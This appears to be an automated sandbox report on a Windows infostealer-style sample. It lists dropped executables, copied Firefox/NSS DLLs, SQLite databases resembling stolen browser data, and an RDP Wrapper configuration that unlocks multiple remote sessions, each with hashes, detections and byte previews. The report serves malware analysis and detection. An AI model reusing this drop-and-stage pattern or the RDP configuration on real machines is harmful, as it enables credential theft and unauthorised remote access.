Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: smss.exe, Detection: malicious, Browse Filename: CVE-2024-38143 poc.exe, Detection: malicious, Browse Filename: LisectAVT_2403002A_44.exe, Detection: malicious, Browse Filename: 6aa115e03c3a0a7a2e8b8122c4c484263dc004c6b1f168b98922d89d6570a6e4_payload.exe, Detection: malicious, Browse Filename: 234880953-042446-sanlccjavap0003-3849.exe, Detection: malicious, Browse Filename: YQR4CA11sP.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.rB/.!B/.!B/.!.~.!j/.!.~.!&/.!.~3!H/.!..'!G/.!B/.!./.!O}.!F/.!O}0!C/.!O}7!C/.!O}2!C/.!RichB/.!................PE..d...Z..T.........." .................Q....................................... ............`.........................................0...l.......<...................................................................`...p............ ...............................text............................... ..`.rdata..<.... ......................@..@.data....=..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

C:\Program Files\RDP Wrapper\rdpwrap.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\RDPWInst.exe
File Type:	Generic INItialization configuration [SLPolicy]
Category:	dropped
Size (bytes):	443552
Entropy (8bit):	5.4496544667416975
Encrypted:	false
SSDEEP:	768:DUoDQVQpXQq4WDi9SUnpB8fbQnxJcy8RMFdKKb8x8Rr/d6gl/+f8jZ0ftlFn4m7Y:TJGYS33L+MUIiG4IvREWddadl/Fy/k9c
MD5:	92BC5FEDB559357AA69D516A628F45DC
SHA1:	6468A9FA0271724E70243EAB49D200F457D3D554
SHA-256:	85CD5CD634FA8BBBF8D71B0A7D49A58870EF760DA6D6E7789452CAE4CAB28127
SHA-512:	87E210E22631C1A394918859213140A7C54B75AEC9BBC4F44509959D15CFA14ABCBFEB1ADF9CFFA11B2E88F84A8708F67E842D859E63394B7F6036CE934C3CC9
Malicious:	false
Preview:	; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-09-25..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS

C:\ProgramData\EBAAFCAFCB.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	385064
Entropy (8bit):	7.98819744237574
Encrypted:	false
SSDEEP:	6144:bymTbhLAP1TbvdrXIFTjCUBfmfq1VpIe+kUWLD38DEVhyF2tLooTPbJBJaINPK7z:bymTiJVr4FTjCUVsq1we++D3FU2CW7aT
MD5:	47697A60A96C5ADEF362D8DA9A274B7D
SHA1:	16DBC512F121C27E2CB48A61D6DCF166AA792E0D
SHA-256:	63D86693917598DF88D518C057C7680B5BD2DE9ADD384425F81EAD95EEE18DBA
SHA-512:	4F18DB753FBD9F08842630DD2AC97DC6B368269C80DFC8A2F880BAA80010DB013C8168A6C19465F5D843AE135B162A63EB2DC1C48EA93C5B255868C77C591A17
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 43%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$..f............................>.... ........@.. ....................... ............`.....................................S.......................(&........................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H...........0............................................................y.YYl.v^...5f.H$...../.W.a.zz..5O..7...f..S.l\.RB.k.5...Eq.....v......B...f............9v...;(.F. .J.g.i..(....B.B.M.s...<..ub. .l.].....Qg...\.Bc.....$........fVGZ.........8....lH;!..."......p.UO.8.Y"....d..\...dD".sm}.c#.?.4?..Y#.......0....VS..X..\|....G...g.:!rM[~...e.Bp..bz.{....`5......\|..\|b.O....G......A.h...}s8...W.PaG?...U.K%.9].\|.....wc\\|..B..K=.D..u..G.@..q...y0g...5..i.......<

C:\ProgramData\EBAAFCAFCBKF\AKEBFC

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EBAAFCAFCBKF\BAECFH

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with very long lines (1765), with CRLF line terminators
Category:	dropped
Size (bytes):	9976
Entropy (8bit):	5.499944288613473
Encrypted:	false
SSDEEP:	192:NzKneRdpYbBp6znmUzaX/6aRMKWPzDNBw8DK9mSl:Nz5eUmUtgmrwbw0
MD5:	42594FD09C4DF3B174CF5D59B1CAB13A
SHA1:	1B78FEB748C36A592C468A76BB60E98187D7BE4A
SHA-256:	F8B55E3B04E0A59BB745C43763D8FBC1CFFDBC247B5525A489B4B74A57319393
SHA-512:	E2430AB14ADF2EF1CC2CB1F96DEADAFB3598B803A5E7724FDDB68ACF015D7E052291626A3D100FED902731DBFD10A9AE3387581AD2867F64D0B27E8D51B9069F
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "38829aa4-f57e-4fd8-bfd3-d094d57ae30f");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696493966);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696493970);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\EBAAFCAFCBKF\DBGHDG

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EBAAFCAFCBKF\ECBGIE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EBAAFCAFCBKF\ECBGIE-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EBAAFCAFCBKF\HDGIEB

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EBAAFCAFCBKF\IEBFIE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EBAAFCAFCBKF\JJJJKE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1373607036346451
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
MD5:	64BCCF32ED2142E76D142DF7AAC75730
SHA1:	30AB1540F7909BEE86C0542B2EBD24FB73E5D629
SHA-256:	B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
SHA-512:	0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EBAAFCAFCBKF\KFBGCA

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8475592208333753
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOF30AvJ3qj/880C4pwE1:TeAFawNLopFgU10XJBORJ6px4p7
MD5:	BE99679A2B018331EACD3A1B680E3757
SHA1:	6E6732E173C91B0C3287AB4B161FE3676D33449A
SHA-256:	C382A020682EDEE086FBC56D11E70214964D39318774A19B184672E9FD0DD3E0
SHA-512:	9CFE1932522109D73602A342A15B7326A3E267B77FFF0FC6937B6DD35A054BF4C10ED79D34CA38D56330A5B325E08D8AFC786A8514C59ABB896864698B6DE099
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EBAAFCAFCBKF\KFCFBF

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03708713717387235
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxW/Hy4XJwvnzfXfYf6zfTfN/0DApVJCI:58r54w0VW3xW/bXWzvACzbJ0DApVJ
MD5:	85D6E1D7F82C11DAC40C95C06B7B5DC5
SHA1:	96EA790BA7A295D78AD5A5019D7EA5E9E8F4B0BD
SHA-256:	D9AD18D2A91CB42FD55695B562D76337BBB4A6AEB45D28C4554297B4EE0DC800
SHA-512:	5DD2B75138EFB9588E14997D84C23C8225F9BFDCEA6A2A1D542AD2C6728484E7E578F06C4BA238853EAD9BE5F9A7CCCF7B2B49A0583FF93D67F072F2C5165B14
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EBAAFCAFCBKF\KFCFBF-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECFHCGHJDBFI\BAAAKJ

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECFHCGHJDBFI\GCGHII

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECFHCGHJDBFI\KKFHJJ

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8475592208333753
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOF30AvJ3qj/880C4pwE1:TeAFawNLopFgU10XJBORJ6px4p7
MD5:	BE99679A2B018331EACD3A1B680E3757
SHA1:	6E6732E173C91B0C3287AB4B161FE3676D33449A
SHA-256:	C382A020682EDEE086FBC56D11E70214964D39318774A19B184672E9FD0DD3E0
SHA-512:	9CFE1932522109D73602A342A15B7326A3E267B77FFF0FC6937B6DD35A054BF4C10ED79D34CA38D56330A5B325E08D8AFC786A8514C59ABB896864698B6DE099
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JKEHIIJJEC.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	7.6533863237352735
Encrypted:	false
SSDEEP:	1536:a7xe3ckl/Q2slz7jHGZI7rBrWMwgN3R29suranxH2ufS/prrDDhLO6kiz:a7x0I26z/8uz22gaxH2zpXD1O6Jz
MD5:	3FCBAACCA9CC6DCCF0649F5ABB8B73EB
SHA1:	B0C5D6768B041C992DB13ADBF9D1152EAE2DCFE4
SHA-256:	A50E7F2B8528539D7F9EEE179010F35C20AD3854E773E40A98023D594113653A
SHA-512:	055313B85862F58573A589785B3D6A63FF41B105FD78BD7956DFF7EC532075CC03954AE492F50562ED5FAA6850656570A22552C75A5E47EA768CED8893768AC6
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\ProgramData\JKEHIIJJEC.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..............#... ...@....@.. ....................................`..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H............&...........-...............................................(#.....(....6.\|.....(0...Vs1...r...p(....(2...Js1....s3....(4...Zr...p(....(.....oE.....(N...:....r...p(.....r0..p(....(O...(.....r...p(....(....r...p(....oE...:....r...p(....r...p(.....r...p(.....{....r...p(....(X...oY...(Z...b.:....rZ..p(.....o[....0..n.........(.....s....(....r...po....(.....s.......o.......o.......o......o..........io.......o.....(......o......+......0../.........(....}

C:\ProgramData\KECGDBFCBK.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	413224
Entropy (8bit):	7.989371105778008
Encrypted:	false
SSDEEP:	12288:WFVCXJfc+aP2LQB0g7YUsKEJGxhimXJEO:MCX2d+LQqbKEJQim5t
MD5:	F73186DF5A030CF7F186B0737C3AF1F7
SHA1:	D15E45FEEFBBC010DB92AE897D80BC7419C0D046
SHA-256:	05C67A9765FE1EBEBCEDAEE376F87A803D7CD37E6C5C19F7D336C2F14A4EF207
SHA-512:	A6E4D6E34748FA8FB9153E2104CF49CC36AF9B22E29C8DF050DE0DB4E14E9DD18ED178B4BBACD6289A0A55B465C996FB931799BA970DFE559C85215DB7E31DF1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................><... ...@....@.. ....................................`..................................;..S....@...............(..(&...`.......:............................................... ............... ..H............text...D.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......&..............@..B................ <......H..........0...............................................................^.8=..Q..v A.3[R.J.._....f..9.\l..vC#SsnB~.E..~.i..7.}+.V...#..8..f.#XW....b...(..............<O.......1.$.=UN8.)..LL....(K....,r.....%9.L.Y.=0..T4.&.....d....(U....'="...(>.d..+..92...p8.1..Pa\q....]X./a.@0C.PQ...B...v..6....le2....4I3.......P.C:...v.}.Q.wp..S(A.Qg.'..N.._X.mvg...J/J6.^...D^MI.O4.5.+....e...^.DIf?.1$;7..x...M..q.q.{'...I..CN.n...a.P.8....!0..\.^.'...3.._....,\

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
